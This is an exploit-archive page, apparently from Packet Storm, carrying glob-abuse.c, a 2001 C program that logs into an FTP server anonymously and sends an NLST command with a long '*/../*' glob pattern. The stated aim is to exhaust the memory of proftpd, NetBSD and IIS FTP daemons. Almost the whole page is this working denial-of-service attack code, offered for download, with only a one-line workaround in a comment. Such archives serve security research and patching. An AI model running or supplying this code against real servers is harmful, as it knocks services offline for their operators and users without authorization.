exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

glob-abuse.c

glob-abuse.c
Posted Mar 19, 2001
Authored by R00T-dude

This code exploits a bug in the glob() function used in some ftpd's (like proftpd, netbsd ftpd, iis ftpd). It sends a 'ls' command for which will take up about 100% of a systems memory, creating a very effective dos.

tags | exploit
systems | netbsd
SHA-256 | 7f1cdb3862da20f5231d975f2a3cbd7fb8960b8beeaf13ca49ae65058f1a1479

glob-abuse.c

Change Mirror Download
/*
* This code exploits a bug in the glob() function used
* in some ftpd's (like proftpd, netbsd ftpd, iis ftpd, ...)
* it sends a 'ls' command for * /../*
* which will take up about 100% of a systems memory and
* creating a VERY effective DoS !
*
* a workaround for this DoS is to filter out strings that
* can be used to abuse the glob() function !
*
* This program was coded by R00T-dude
*
* Greetz to: f0bic, incubus, t-omicron, nostalgic, zym0t1c,
* tosh, vorlon, cicero, sentinel, shaolin_p, so many others !
*
*/

#include <stdio.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>

#define USER "anonymous" /* change if needed */
#define PASS "rdude@just.dossed.y0u.org" /* change if needed */
#define PORT 21 /* change if needed */
#define DELAY 2

main(int argc, char **argv)
{
int sock, conn, i;
char buffer[250];
char user[30];
char pass[30];
struct hostent *hp;
struct sockaddr_in sin;

if (argc < 2)
{
printf("useage :: %s ip/hostname ", argv[0]);
printf("example : %s 127.0.0.1 \n", argv[0]);
exit(0);
}

if ((hp=gethostbyname(argv[1])) == NULL )
{
perror("gethostbyname() failed :");
exit(-1);
}

sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
{
perror("socket() failed :");
exit(sock);
}

sin.sin_family = AF_INET;
sin.sin_port = htons(PORT);
sin.sin_addr.s_addr = inet_addr(argv[1]);

conn = connect(sock, (struct sockaddr *)&sin, sizeof(sin));

if (conn < 0)
{
perror("connect() failed :");
exit(conn);
}
printf("ok, connected, lets's log in shall we ... \n");

sprintf(user, "USER %s\r\n", USER );
sprintf(pass, "PASS %s\r\n", PASS );

write(sock,user,strlen(user));
printf("sended : %s", user);
sleep(DELAY);
write(sock,pass,strlen(pass));
printf("sended : PASS ");
for (i=0; i < strlen(PASS); i++)
{
printf("*");
}
printf("\n");
sleep(DELAY);

bzero(buffer, sizeof(buffer));
sprintf(buffer, "EPSV\n");
write(sock,buffer,strlen(buffer));
printf("sended : %s", buffer);
sleep(DELAY);

bzero(buffer, sizeof(buffer));
sprintf(buffer, "PASV\n");
write(sock,buffer,strlen(buffer));
printf("sended : %s", buffer);
sleep(DELAY);

bzero(buffer, sizeof(buffer));
sprintf(buffer, "NLST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*\n");
write(sock,buffer,strlen(buffer));
printf("sended : %s", buffer);
sleep(DELAY);
close(sock);
}
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    21 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close